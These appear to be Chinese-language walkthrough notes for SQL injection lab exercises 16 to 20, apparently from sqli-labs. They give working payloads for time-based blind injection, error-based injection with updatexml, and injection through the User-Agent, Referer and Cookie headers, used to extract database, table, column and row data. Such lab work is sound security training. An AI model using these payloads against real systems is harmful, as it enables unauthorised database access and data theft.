16
判断数据库长度admin") and if(length(database())=8,sleep(5),1)#
判断数据库第一个字母admin") and if(substr(database(),1,1)='s',sleep(5),1)#
依次判断完,为security
再判断表长admin") and if(length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5,sleep(5),1)#
表名admin") and if(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u',sleep(5),1)#
依次判断完,为users
再接着判断列,数据用相同的盲注方法
17
此题注入点在new password,先在User Name 中输入admin
再在new password中输入uname=admin&passwd=admin' and updatexml(1,concat(0x7e, database(),0x7e),1)#
得数据库名称
再爆表名,new password中输入admin会出错,就用1代替1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) #片
爆列名1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #
爆数据,因为爆USER出现错误,就爆emails1' and updatexml(1,concat(0x7e,(select group_concat(id) from emails),0x7e),1) #
18
在火狐插件ModHeader填写相关信息及爆库,再在usename password中输入正确密码admin,得数据库名称
爆表,同样在插件中进行输入’ or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e),1) or ‘1’='1,再输入密码
爆列,与前面一样
爆数据
19
这道题和前一道相似,只需将User-Agent改为Referer
爆库
爆表爆列
爆数据
20
在火狐插件Cookie Editor中进行操作,爆库,再将页面刷新
爆表
爆列
爆数据